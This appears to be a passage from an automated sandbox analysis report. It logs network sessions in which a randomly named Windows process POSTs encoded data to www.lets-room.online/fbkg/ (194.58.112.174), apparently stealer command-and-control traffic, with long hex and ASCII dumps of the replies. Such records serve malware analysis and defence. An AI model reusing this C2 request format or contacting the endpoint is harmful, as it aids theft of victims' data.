46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                                                                                                Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468121052 CET600INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                                                                                                Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468142986 CET601INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                                                                                                Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                24192.168.11.2050151194.58.112.17480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:21.250534058 CET597OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.lets-room.online
                                                                                                                                                                                                Referer: http://www.lets-room.online/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 34 63 65 41 45 71 4c 31 76 72 73 6b 74 4e 32 53 67 64 4a 53 65 75 46 72 56 36 6e 66 6b 4d 39 62 67 73 61 56 64 55 34 52 47 74 64 50 46 72 4a 33 75 63 34 77 5a 71 67 4d 4e 38 70 35 43 57 69 36 63 71 48 76 6e 59 6b 50 58 51 4a 30 45 72 71 52 71 6b 66 35 6b 41 73 36 78 33 36 67 48 68 6d 44 34 2b 73 68 2b 38 34 73 47 4b 34 42 75 39 79 78 69 55 55 37 4e 32 70 46 61 75 57 4a 4d 44 59 73 65 44 53 49 77 6d 4f 4a 63 4a 56 4d 78 65 55 64 56 4b 46 7a 46 62 4d 35 65 4c 44 62 44 52 2b 6b 38 4b 74 57 7a 47 35 70 6d 6c 79 68 45 4d 33 53 47 32 37 67 70 54 4c 6e 41 6b 36 71 76 31 41 6b 34 46 73 50 33 75 30 36 41 30 4f 6c 6c 69 66 61 6b 49 58 47 6c 56 64 37 58 66 41 58 46 6a 48 33 56 65 56 52 37 65 2f 74 67 31 56 2f 51 62 44 61 75 6e 75 72 43 32 4e 4c 38 39 5a 6b 42 4b 54 35 62 79 74 53 66 57 4b 6b 34 36 4a 4e 45 77 64 36 6c 34 36 4a 45 59 4a 77 2f 2f 55 4c 5a 4c 56 6c 63 49 4a 47 77 49 42 4f 4f 46 53 7a 39 51 51 35 4b 55 4c 4e 6f 76 46 58 67 42 4c 5a 6e 46 43 4c 52 37 4c 59 6e 6e 45 49 46 64 7a 59 6d 75 5a 41 37 2f 38 73 45 39 77 46 32 48 6d 44 6d 58 32 50 72 76 70 6a 4d 30 6f 68 4a 37 69 46 62 69 62 54 6a 65 5a 54 35 6f 4a 52 32 77 67 68 51 2f 39 41 4d 41 49 75 6e 6e 6d 70 48 58 4c 73 45 45 38 30 43 39 48 50 2f 58 52 5a 79 6b 48 53 48 34 52 44 2b 4f 74 46 47 2b 49 50 46 4f 6f 66 75 75 71 39 47 43 48 37 6a 6f 6e 79 56 38 2b 41 41 58 39 6a 68 50 71 30 52 57 6f 34 6e 56 6b 79 4b 2b 66 61 52 35 58 73 70 75 33 54 75 31 75 34 6d 6f 62 74 4f 74 4d 35 70 4a 61 41 62 50 51 50 2f 6f 51 48 57 2f 43 2f 68 52 61 49 55 61 33 43 72 37 72 65 34 68 55 56 76 50 6f 3d
                                                                                                                                                                                                Data Ascii: T6I=4ceAEqL1vrsktN2SgdJSeuFrV6nfkM9bgsaVdU4RGtdPFrJ3uc4wZqgMN8p5CWi6cqHvnYkPXQJ0ErqRqkf5kAs6x36gHhmD4+sh+84sGK4Bu9yxiUU7N2pFauWJMDYseDSIwmOJcJVMxeUdVKFzFbM5eLDbDR+k8KtWzG5pmlyhEM3SG27gpTLnAk6qv1Ak4FsP3u06A0OllifakIXGlVd7XfAXFjH3VeVR7e/tg1V/QbDaunurC2NL89ZkBKT5bytSfWKk46JNEwd6l46JEYJw//ULZLVlcIJGwIBOOFSz9QQ5KULNovFXgBLZnFCLR7LYnnEIFdzYmuZA7/8sE9wF2HmDmX2PrvpjM0ohJ7iFbibTjeZT5oJR2wghQ/9AMAIunnmpHXLsEE80C9HP/XRZykHSH4RD+OtFG+IPFOofuuq9GCH7jonyV8+AAX9jhPq0RWo4nVkyK+faR5Xspu3Tu1u4mobtOtM5pJaAbPQP/oQHW/C/hRaIUa3Cr7re4hUVvPo=
                                                                                                                                                                                                Nov 17, 2023 19:29:21.467825890 CET599INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:29:21 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                                                                                                Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468121052 CET600INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                                                                                                Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                                                                                                Nov 17, 2023 19:29:21.468142986 CET601INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                                                                                                Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                25194.58.112.17480192.168.11.2050152C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:23.991671085 CET608OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.lets-room.online
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.lets-room.online
                                                                                                                                                                                                Referer: http://www.lets-room.online/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 34 63 65 41 45 71 4c 31 76 72 73 6b 74 4e 32 53 67 64 4a 53 65 75 46 72 56 36 6e 66 6b 4d 39 62 67 73 61 56 64 55 34 52 47 74 56 50 46 39 64 33 6f 39 34 77 59 71 67 4d 45 63 70 30 43 57 69 37 63 72 6a 72 6e 59 59 66 58 53 42 30 46 38 6d 52 72 58 33 35 68 41 73 33 39 58 36 69 52 52 6d 58 34 2b 70 6f 2b 38 74 62 47 35 6b 42 70 36 4f 78 6c 6e 73 34 42 47 6f 4f 61 75 58 62 49 44 59 6b 65 44 57 6d 77 6d 4b 4a 63 4e 70 4d 33 73 73 64 58 64 52 7a 66 37 4d 2b 58 72 44 59 4a 78 2b 76 38 4b 35 6f 7a 47 35 44 6d 6b 32 68 45 50 2f 53 48 78 6e 6a 71 7a 4c 6e 44 6b 36 70 6c 6c 63 67 34 46 77 48 33 75 41 36 41 7a 61 6c 6b 43 66 61 6d 71 7a 46 68 31 64 39 61 2f 42 42 50 7a 37 2f 56 65 78 37 37 61 6e 74 67 6c 42 2f 51 71 44 61 69 69 61 72 43 57 4e 46 34 39 5a 33 49 71 53 39 62 79 38 35 66 58 71 61 34 39 78 4e 4c 30 4a 36 67 5a 36 47 4e 59 4a 36 6d 50 56 42 4b 62 5a 70 63 4d 74 6b 77 49 42 67 4f 48 2b 7a 2b 6a 49 35 4a 57 6a 4d 6c 66 46 4e 31 78 4b 44 73 6c 2b 37 52 37 58 41 6e 6e 63 59 46 61 44 59 6e 4f 5a 41 72 49 41 74 4d 4e 77 49 37 6e 6d 33 6f 33 32 69 72 76 6c 5a 4d 77 78 65 4a 49 6d 46 61 53 72 54 77 2b 5a 51 70 59 4a 64 39 51 68 6b 55 2f 39 41 4d 41 46 66 6e 6e 71 70 48 6e 7a 73 45 7a 59 30 45 75 76 50 35 58 52 62 79 6b 48 50 48 35 73 39 2b 50 56 37 47 2f 34 6c 46 4d 45 66 76 36 75 39 4c 6d 7a 6b 6e 59 6d 32 52 38 2b 58 66 6e 78 4f 68 50 66 33 52 53 4a 4e 67 6c 59 79 4a 2f 76 61 48 4a 58 76 37 2b 33 59 2b 56 75 71 33 34 57 30 4f 74 52 45 70 4a 76 4e 62 4e 51 50 38 4f 5a 41 46 64 2b 63 69 48 66 6b 63 2f 4c 64 73 61 36 52 67 77 45 41 7a 4a 70 31 51 66 67 4b 41 4b 73 56 51 53 50 30 47 6c 46 65 6a 5a 63 66 50 42 35 79 79 34 54 69 58 4b 58 59 2b 47 50 34 6d 74 31 76 68 6c 4a 4a 33 35 47 4b 73 7a 77 33 75 43 72 5a 59 37 6c 41 32 75 61 63 57 6e 70 55 49 6e 55 66 53 6d 50 66 6a 42 64 68 6d 71 36 31 72 67 37 6a 6a 33 58 64 31 56 65 4d 65 69 76 37 6b 54 47 35 70 35 32 53 48 35 61 4b 66 42 33 56 7a 64 41 5a 4e 36 53 32 31 4b 43 6f 72 50 57 48 50 33 34 39 6a 54 4f 48 66 6c 66 79 2b 78 4a 56 63 76 78 79 37 71 32 50 46 2b 46 66 4d 36 6e 48 46 61 66 7a 42 74 33 48 63 4b 45 4d 2f 50 4f 47 67 69 5a 39 67 47 4a 71 64 4a 77 2b 4f 31 63 78 5a 67 4d 4b 70 6a 6c 64 30 73 6d 43 39 42 55 4e 72 4e 68 30 66 48 75 6f 53 76 4b 4e 33 31 71 4a 56 37 36 63 35 78 72 32 52 6d 63 46 4b 64 70 31 56 6b 78 76 68 6e 49 36 50 47 4e 6e 45 2f 47 35 4a 62 30 31 4c 76 34 52 55 35 38 47 56 71 76 50 4b 32 76 58 67 4d 43 42 6a 54 41 58 4a 4e 77 37 77 6a 76 57 47 5a 38 30 4b 4a 58 44 79 67 2f 43 35 37 6d 64 34 47 6a 67 36 6c 67 31 4d 51 53 69 51 64 75 52 6e 32 6a 6d 58 6d 6e 34 61 32 61 5a 70 7a 66 58 73 65 6b 7a 53 63 59 43 43 39 74 4c 74 44 57 74 76 64 4a 56 4e 4a 67 59 35 6e 61 51 32 55 66 44 70 37 38 30 4e 38 6b 35 62 6e 30 5a 67 65 38 4d 4e 2b 72 45 35 32 46 38 2f 4b 4b 69 64 69 35 68 33 61 64 68 62 51 48 56 69 59 61 56 4c 33 76 7a 36 51 6c 38 79 6a 56 66 41 4c 62 57 6c 71 76 55 5a 6f 7a 67 47 64 6e 71 47 72 48 45 65 52 47 37 41 54 46 62 70 66 56 4f 31 6f 33 65 2b 72 41 47 77 45 69 54 6d 2f 64 30 33 78 46 7a 4b 54 53 72 53 2b 49 68 43 36 6f 53 4a 32 48 53 52 35 77 64 53 4b 30 33 31 65 42 71 4d 50 64 4e 47 7a 4f 71 51 72 47 72 76 70 46 32 77 46 6f 7a 39 42 52 48 31 45 6c 64 5a 4c 4e 39 68 6e 44 57 43 48 36 4e 6f 4e 71 50 71 35 2b 65 75 6c 78 7a 6b 4d 58 49 36 37 65 36 57 32 75 66 65 52 65 77 48 73 30 67 53 72 79 56 35 6d 33 61 70 42 74 72 6a 31 69 51 43 4d 59 53 44 2f 2f 6c 4c 50 6b 44 4c 66 55 51 4b 37 30 61 67 6a 64 4f 33 32 4c 75 70 56 66 4a 37 55 63 65 61 68 72 43 76 47 39 51 46 49 53 50 78 48 52 57 4c 6d 51 42 6a 6c 4f 78 67 32 6a 44 61 68 69 79 52 4f 78 63 2f 67 37 7a 58 36 69 6f 2b 50 39 39 55 59 58 47 75 57 41 75 33 35 2f 33 75 37 5a 73 74 6a 73 4c 66 76 51 63 4f 63 6d 4d 69 54 46 2b 76 70 4d 37 46 77 32 38 7a 35 54 63 4b 71 44 77 5a 70 48 77 67 58 35 50 4d 31 50 78 51 45 52 59 32 42 6b 59 45 59 2b 70 66 61 31 6a 50 42 6e 4b 6c 53 64 57 48 4c 41 63 52 77 6b 35 43 57 39 4a 78 54 2f 4c 48 49 56 73 4e 50 74 73 66 6a 74 2f 79 6a 6d 77 59 47 4c 32 38 68 44 31 64 4a 41 48 34 68 79 44 36 69 63 37 4b 31 5a 67 57 4a 71 42 74 44 6e 6c 52 79 6c 39 76 30 42
                                                                                                                                                                                                Data Ascii: T6I=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